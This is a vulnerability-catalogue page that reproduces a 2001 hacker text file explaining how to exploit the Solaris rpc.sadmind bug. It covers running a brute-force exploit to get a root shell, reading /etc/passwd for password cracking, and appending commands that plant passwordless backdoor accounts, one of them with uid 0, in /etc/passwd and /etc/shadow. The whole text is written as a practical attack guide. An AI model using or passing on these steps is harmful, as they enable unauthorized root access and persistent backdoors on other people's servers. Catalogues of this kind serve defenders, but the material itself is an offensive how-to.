Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sadmind-howto.txt

🗓️ 22 Nov 2001 00:00:00Reported by CyraxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Exploit rpc.sadmind bug using brute forcer for rootshell access and user creation methods.

Code
`rpc.sadmind (27/02/2000)  
------------------------  
  
The bug rpc.sadmind has been reported a long time ago. But there has never  
been a manual for it. So i decided to explain how to exploit the bug.  
First of all i would recommend to use the sadmind brute forcer for the   
sploit files sadmindex-sparc.c and sadmindex-x86.c , you can find the   
brute forcer at http://packetstormsecurity.org . Search for sadmind   
brute forcer and the file samdind-brute-lux.c will be the first file   
you'll see...  
You compile the brute forcer in the same directory as the sploit  
files.  
Run the brute forcer like this :  
./sadmind-brute-force <arch> <host>  
If you don't know what <arch> is then you do ./sadmind-brute-lux  
You'll understand now =)  
When you have found a vulnerable host (you can scan for RPC stuff with RPC-  
scanners LOL) you do this for example  
./sadmind-brute-force 1 www.sadmindvulnhost.com  
  
If you're dropped to a rootshell now, the host is vulnerable for real.  
Otherwise, the host is patched.  
  
Now you're dropped to the rootshell you have 2 easy ways to exploit the  
rpc.sadmind bug.  
The first way, this is kinda lame, is that you view the /etc/passwd   
(or the /etc/shadow ofcourse) and then crack the password file with  
a password-cracker like John The Ripper --> this can take years !  
You view the /etc/passwd like this  
cat /etc/passwd;  
The ; must be added ! If ya type cat /etc/passwd the server will recognize   
this command as  
cat /etc/passwd^m  
  
The second way to exploit the bug is a lot faster then the first one.  
Here we simply add two users, one with root privileges ofcourse...  
This example is for a host with /etc/shadow !  
Type this at the rootshell :  
  
echo cyrax:x:UID:GID:cyrax:/:/bin/sh >> /etc/passwd;  
echo cyrax2:x:0:0:cyrax:/:/bin/sh >> /etc/passwd;  
echo cyrax:::::: >> /etc/shadow;  
echo cyrax2:::::: >> /etc/shadow;  
  
Dont use > instead of >>, >> adds a line, > overwrites !  
Replace UID and GID by 666 for example but NOT by 0  
After you typed this, there will be added two users to the server :  
cyrax and cyrax2  
You login with the non-root user, cyrax, and then do su cyrax2  
and set the password for the users ...  
Now you have root access to the server...  
  
Written by : CyRaX ([email protected])  
http://members.antionline.com/cyrax  
Special thanks to : nostalg1c   
greet[z] : kemX, Cheitan, guppy, |llus|0{\}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Nov 2001 00:00Current
7.4High risk
Vulners AI Score7.4
rpc sadmind bugexploit methodbrute forcerrootshell accesspassword crackuser creation
30